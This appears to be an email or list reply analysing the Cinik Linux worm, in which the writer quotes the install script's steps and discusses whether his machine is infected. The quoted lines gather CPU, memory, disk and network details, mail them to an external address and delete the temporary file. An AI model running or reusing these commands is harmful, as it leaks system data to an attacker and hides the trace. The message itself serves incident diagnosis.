Hi gabe
The worm didn't send that mail, the script used to install the worm did that.
here is a copy of the part of the install script that do that:
The first part is to collect machine info:
echo PROC > /tmp/.cinik.status (get machine data)
cat /proc/cpuinfo >> /tmp/.cinik.status
echo MEM >> /tmp/.cinik.status
/usr/bin/free >> /tmp/.cinik.status
echo HDD >> /tmp/.cinik.status (get partitions/disks,etc)
/bin/df -h >> /tmp/.cinik.status
echo IP >> /tmp/.cinik.status (ifconfig, ip addresses, nets)
/sbin/ifconfig >> /tmp/.cinik.status
Then send the mail to the above address and then erases that file:
myip=/sbin/ifconfig eth0 | head -2 | tail -1 | cut -d: -f2 | cut -d" " -f1
mail cinik_worm@yahoo.com -s "$myip" < /tmp/.cinik.status
rm -f /tmp/.cinik.status
in my case, I though that the worm was operational but i have no gcc
so even if the script sends the email i doesn't mean that you are effectively
infected.
still I'm not sure if I'm infected with cinik or not, it seems that it's not
infected, tried to contact to the ports mentioned in the source code of
the worm but didn't work, so it's highly probable that the worm coulndn't
compile.
see you
Leo